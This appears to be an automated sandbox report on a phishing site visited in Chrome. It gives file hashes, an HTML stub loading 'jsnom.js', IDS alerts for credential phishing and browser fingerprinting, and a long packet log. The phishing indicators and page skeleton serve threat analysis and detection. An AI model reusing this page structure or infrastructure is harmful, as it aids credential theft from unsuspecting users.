                                                                              Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqQTVNVEF5TURJMFZUUTBNVEF3T1RJeA==' vic='' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                              Category:dropped
                                                                              Size (bytes):673
                                                                              Entropy (8bit):7.6596900876595075
                                                                              Encrypted:false
                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):2361
                                                                              Entropy (8bit):4.991940218545207
                                                                              Encrypted:false
                                                                              SSDEEP:24:hPsUhMjWBjoTfM8EPsQ345gG0A9ZG0QgG03QVuEEFHpken/ChpZqC6mLp:t2MGPEED/amQVuEa9KEC6mV
                                                                              MD5:11A0BBC52834CF74DA795D5815B7DC63
                                                                              SHA1:5D401CF953DF570210427A92D27E00DDF403F4B7
                                                                              SHA-256:C989A169A129121F006C8FCBF90AB305D9005D516CE72CC44B4949167EED39D5
                                                                              SHA-512:BDC773E24231DCC13DB01881C1977C091F565D1505AB8FB8AAF7F6565DDCBC36B1943126D51E43E701A49C6C024E9D335B50CA546E8058029844255F2796A62C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://rieg.riegriegrieg.com/favicon.ico
                                                                              Preview:<!DOCTYPE html>..<html lang="pt-BR">.. <head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <meta name="format-detection" content="telephone=no">.. <meta name="robots" content="noindex">.. <title>Hospedagem de Site com Dom.nio Gr.tis - HostGator</title>.. <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128">.. <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192">.. <link rel="apple-
                                                                              No static file info
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-26T08:48:44.311293+02002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.449742192.185.209.0443TCP
                                                                              2024-10-26T08:48:45.776561+02002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449745192.185.209.0443TCP
                                                                              2024-10-26T08:48:47.350342+02002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449747192.185.209.0443TCP
                                                                              2024-10-26T08:49:51.364228+02002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.449934192.185.209.0443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 26, 2024 08:48:33.073796034 CEST49675443192.168.2.4173.222.162.32
                                                                              Oct 26, 2024 08:48:38.513735056 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:38.513787985 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:38.513864040 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:38.514156103 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:38.514202118 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:38.514425993 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:38.514540911 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:38.514558077 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:38.514771938 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:38.514786959 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.381115913 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.381548882 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.381582022 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.382703066 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.382823944 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.383047104 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.384216070 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.384234905 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.384268999 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.384318113 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.384496927 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.384507895 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.385749102 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.385822058 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.386229038 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.386313915 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.428000927 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.428034067 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.428039074 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.474354029 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.658613920 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.708398104 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.708422899 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.709157944 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.709333897 CEST44349736172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.709410906 CEST49736443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.711950064 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.755354881 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.994591951 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.997041941 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:39.997087955 CEST44349735172.217.16.195192.168.2.4
                                                                              Oct 26, 2024 08:48:39.997147083 CEST49735443192.168.2.4172.217.16.195
                                                                              Oct 26, 2024 08:48:40.519634008 CEST4973980192.168.2.4103.255.237.40
                                                                              Oct 26, 2024 08:48:40.525104046 CEST8049739103.255.237.40192.168.2.4
                                                                              Oct 26, 2024 08:48:40.525274992 CEST4973980192.168.2.4103.255.237.40
                                                                              Oct 26, 2024 08:48:40.526001930 CEST4973980192.168.2.4103.255.237.40
                                                                              Oct 26, 2024 08:48:40.531403065 CEST8049739103.255.237.40192.168.2.4
                                                                              Oct 26, 2024 08:48:40.968652010 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:40.968724966 CEST44349740142.250.184.196192.168.2.4
                                                                              Oct 26, 2024 08:48:40.968806982 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:40.969687939 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:40.969711065 CEST44349740142.250.184.196192.168.2.4
                                                                              Oct 26, 2024 08:48:41.586899042 CEST8049739103.255.237.40192.168.2.4
                                                                              Oct 26, 2024 08:48:41.635854006 CEST4973980192.168.2.4103.255.237.40
                                                                              Oct 26, 2024 08:48:41.827862978 CEST44349740142.250.184.196192.168.2.4
                                                                              Oct 26, 2024 08:48:41.829562902 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:41.829598904 CEST44349740142.250.184.196192.168.2.4
                                                                              Oct 26, 2024 08:48:41.831147909 CEST44349740142.250.184.196192.168.2.4
                                                                              Oct 26, 2024 08:48:41.831211090 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:41.873006105 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:41.873090982 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:41.873161077 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:41.875112057 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:41.875135899 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:42.001770020 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:42.002001047 CEST44349740142.250.184.196192.168.2.4
                                                                              Oct 26, 2024 08:48:42.048532009 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:42.048578978 CEST44349740142.250.184.196192.168.2.4
                                                                              Oct 26, 2024 08:48:42.093436956 CEST49740443192.168.2.4142.250.184.196
                                                                              Oct 26, 2024 08:48:42.124744892 CEST4973980192.168.2.4103.255.237.40
                                                                              Oct 26, 2024 08:48:42.130202055 CEST8049739103.255.237.40192.168.2.4
                                                                              Oct 26, 2024 08:48:42.336194992 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:42.336245060 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:42.336313009 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:42.336558104 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:42.336636066 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:42.336689949 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:42.336893082 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:42.336915970 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:42.337116003 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:42.337135077 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:42.479914904 CEST8049739103.255.237.40192.168.2.4
                                                                              Oct 26, 2024 08:48:42.534408092 CEST4973980192.168.2.4103.255.237.40
                                                                              Oct 26, 2024 08:48:42.722080946 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:42.722172976 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:42.790815115 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:42.790872097 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:42.791234016 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:42.833148956 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:42.977900982 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:42.980402946 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.019109011 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.020678997 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.040539980 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.040577888 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.041017056 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.041040897 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.044521093 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.044626951 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.044884920 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.044970036 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.095334053 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.095484972 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.095748901 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.095868111 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.096374989 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.096410990 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.118588924 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:43.146420956 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.146424055 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.146450996 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.163346052 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.192071915 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.454586029 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.454765081 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.454802036 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:43.454878092 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.454905987 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:43.454905987 CEST49741443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:43.454919100 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.454926968 CEST44349741184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.496084929 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:43.496157885 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.496357918 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:43.496691942 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:43.496712923 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:43.746299028 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.746341944 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.746349096 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.746424913 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.746433973 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:43.746475935 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.748143911 CEST49743443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:43.748173952 CEST44349743192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.250788927 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.250860929 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.251096010 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.309489012 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.309540987 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.310342073 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.310830116 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.310864925 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.310956955 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.310976028 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.310981989 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.311050892 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.311070919 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.311094999 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.311158895 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.327080011 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.327300072 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.327325106 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.338407993 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:44.338494062 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:44.351530075 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.351560116 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.354769945 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.354790926 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.354902983 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.354908943 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.359118938 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:44.359158993 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:44.359482050 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:44.361653090 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:44.407339096 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:44.604849100 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:44.604935884 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:44.604978085 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:44.618077993 CEST49744443192.168.2.4184.28.90.27
                                                                              Oct 26, 2024 08:48:44.618118048 CEST44349744184.28.90.27192.168.2.4
                                                                              Oct 26, 2024 08:48:44.966614962 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.968306065 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.968339920 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.968730927 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:44.973392010 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:44.973550081 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.018532991 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:45.199985027 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.200086117 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.202914000 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:45.203670979 CEST49742443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:45.203686953 CEST44349742192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.621658087 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:45.632355928 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:45.632397890 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:45.632473946 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:45.633048058 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:45.633065939 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:45.667342901 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.776576996 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.776608944 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.776616096 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.776678085 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:45.776707888 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.819530010 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:45.896673918 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.896692038 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.896754026 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:45.897248983 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.897259951 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:45.897304058 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.017340899 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.017359972 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.017415047 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.017452002 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.032979965 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.032999039 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.033054113 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.137797117 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.137814999 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.137871981 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.153276920 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.153359890 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.258419037 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.258512020 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.273927927 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.274003029 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.378552914 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.378664017 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.394561052 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.394743919 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.480967999 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.481286049 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.481302023 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.482372046 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.482420921 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.484350920 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.484416962 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.484697104 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.484704971 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.499532938 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.499618053 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.499680996 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.499731064 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.499746084 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.499842882 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.499886990 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.501023054 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.501040936 CEST44349745192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.501050949 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.501091957 CEST49745443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.537316084 CEST49747443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.537370920 CEST44349747192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.537421942 CEST49747443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.537848949 CEST49747443192.168.2.4192.185.209.0
                                                                              Oct 26, 2024 08:48:46.537859917 CEST44349747192.185.209.0192.168.2.4
                                                                              Oct 26, 2024 08:48:46.552961111 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.729629993 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.817701101 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.846999884 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.847016096 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.847045898 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.847064018 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.847070932 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.847074986 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.847098112 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.847120047 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:46.847132921 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:46.847513914 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:47.156554937 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156570911 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156604052 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156630039 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:47.156646967 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156793118 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156799078 CEST49746443192.168.2.418.245.31.89
                                                                              Oct 26, 2024 08:48:47.156804085 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156820059 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156833887 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156841993 CEST4434974618.245.31.89192.168.2.4
                                                                              Oct 26, 2024 08:48:47.156851053 CEST49746443192.168.2.418.245.31.89
